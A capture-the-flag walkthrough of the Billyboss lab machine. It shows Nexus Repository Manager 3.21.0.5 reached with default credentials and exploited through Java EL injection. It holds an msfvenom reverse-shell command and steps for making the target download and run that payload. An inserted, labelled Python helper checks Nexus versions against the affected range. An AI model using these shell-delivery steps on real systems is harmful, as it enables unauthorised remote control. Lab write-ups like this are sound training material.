Billyboss

Writeup for Billyboss from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.170.61 all

Service Enumeration

HTTP (port 8081)

We see that this is running Sonatype Nexus Repository Manager 3.21.0.5.

We try several common default credential pairs and find that only nexus:nexus works.

Exploit

There is an exploit for Nexus Repository Manager 3, versions 3.21.1 and below, which are vulnerable to Java EL injection; it allows a low-privilege authenticated user to gain RCE on the target.
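As an added defender-side example (not part of the original writeup), the following Python helper parses a Nexus Repository Manager banner and checks it against the affected range the writeup names (3.x, 3.21.1 and below). It is the kind of check an asset-inventory script would run over collected service banners; the sample banners are constructed for illustration, and the padded tuple comparison handles four-part builds such as 3.21.0.5 correctly against the three-part boundary 3.21.1.

```python
import re

# Affected range as stated in the writeup: Nexus Repository Manager 3,
# versions 3.21.1 and below (upper bound inclusive).
AFFECTED_MAX = (3, 21, 1)

# Matches the numeric version that follows the product name in a banner.
BANNER_RE = re.compile(r"Nexus Repository Manager\s+(\d+(?:\.\d+)+)")


def parse_version(text):
    """Return the version as a tuple of ints from a banner string, or None."""
    m = BANNER_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_affected(version):
    """True if version is a 3.x release at or below 3.21.1."""
    if version is None or version[0] != 3:
        return False
    # Pad both tuples to the same length so that (3,21,0,5) compares
    # against (3,21,1,0) rather than being cut short or mis-ordered.
    n = max(len(version), len(AFFECTED_MAX))
    v = version + (0,) * (n - len(version))
    upper = AFFECTED_MAX + (0,) * (n - len(AFFECTED_MAX))
    return v <= upper


# Constructed sample banners (hypothetical, not collected from any host).
SAMPLE_BANNERS = [
    "Sonatype Nexus Repository Manager 3.21.0.5",
    "Sonatype Nexus Repository Manager 3.21.1",
    "Sonatype Nexus Repository Manager 3.21.2",
    "Sonatype Nexus Repository Manager 3.30.0-01",
    "Apache httpd 2.4.41",
]


def triage(banners):
    """Map each banner to (parsed version, affected flag) for a report."""
    report = {}
    for banner in banners:
        version = parse_version(banner)
        report[banner] = (version, is_affected(version))
    return report


if __name__ == "__main__":
    for banner, (version, affected) in triage(SAMPLE_BANNERS).items():
        print(f"{banner!r}: version={version} affected={affected}")
```

The version regex stops at the first non-numeric suffix (for example the "-01" build tag), so release-tag variants still compare on their numeric components.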

First, we generate our payload using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.170 LPORT=8081

We then modify the script to download our payload and execute it.

Next, we execute the script and verify that the payload has been downloaded to our target machine.

Next, we change the CMD value in the script to 'cmd.exe /c shell.exe' and run the script again.
